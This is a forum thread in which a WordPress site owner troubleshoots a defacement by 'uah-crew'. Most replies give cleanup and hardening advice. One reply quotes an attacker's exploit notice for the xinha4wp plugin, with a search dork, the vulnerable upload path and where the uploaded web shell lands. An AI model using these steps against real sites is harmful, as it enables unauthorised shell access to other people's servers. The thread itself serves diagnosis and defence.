My site has been hacked - atahualpa 3.4.6
hi.
My wordpress' website was just hacked. I strongly suspect Atahualpa, because re-downloading and re-installing it (version 3.4.6) solved the problem. Any page of the website showed this crew signature: "uah-crew". The "hacked" 3.4.6 version is available for reviewing. Just PM or email me and I'll send it to you. Thanks for the attention. Michele |
I would suspect it is your wordpress and/or server that was hacked.
Who is your host? contact them and tell them you have been hacked. What version of WordPress are you running? use FTP and go look at the dates on all your other themes and all other wordpress files and see if there are any with a date that doesn't match the others. Change your wordpress admin password check all users in wordpress cange your ftp passwotd look to see if there are any other FTP users you don't know change your cpanel/host password, check to see if there are any others you don't recognize scan your wordpress database for any potential sql injections do a google search on 'wordpress hacked' and follow the directions This is not a fun thing to have happen or easy thing to have fixed. Hundreds of wordpress sites were hacked into a couple months ago at bluehost and it was a server security issue. good luck recovering |
Dear juggledad,
All I can say is that public_html/wp-content/themes/atahualpa/index.php had been re-written. I am still investigating how. WP is 2.9.2. The original directory has already been replaced on server, and re-installing Atahualpa solved the problem. Thanks for your suggestions, please feel free to change the subject of this post if you feel it's not an atahualpa "hole". Will keep you posted. |
You have wordpress installed in 'public_html'???? how secure is it?
who is the host? what is the url? |
url is www.tendertonaveitalia.net
host is hostingplan.net / Cpanel / linux pardon my ignorance, what is wrong with putting wordpress on your root home directory? Tnx. |
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.
Have you contacted the host to see if anyone else was hacked? |
Quote:
Yes I did contact my host. hopefully They'll find out how the hacker got his hands on the index.php. Thanks you for your feedbacks. Cheers! |
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.
|
Quote:
------ ================================================== ============= Wordpress xinha4wp xinha_core plugins File Upload Vulnerability ================================================== ============= ################################################## ################## Author : Hackeri-AL Contact : hackeri-al[at]live[dot]com Greetz : LoocK3D & all Albania and Kosova Hackers My Group : UAH-Crew = United Albania Hackers ################################################## ################## [~] DORK: /imagemanager/demo_images/wp/ site: com ,de , org / etc... -------------------------------------------------------------------- [~] You go to: htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/ [~] Then we : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/manager.php <[ upload here shell ] [~] Shell : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/yourShell.php ################################################## ################## [~] Video: http://www.youtube.com/watch?v=BG-OVjG8dcs ################################################## ################## [~] Proud 2 be Albania [~] Proud 2 be Muslim [~] United States of Albania ################################################## ################## # Inj3ct0r.com [2010-04-16] ------ |
Sorry, I never got to see the details. My host dealt with it and informed me that I needed to update the plug-ins. I wasn't using ImageManager either though.
|
I see. Thanks. All my plugins are updated now. Hope my host will be able to tell me what the problem was.
|
Quote:
|
All times are GMT -6. The time now is 01:37 PM. |
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.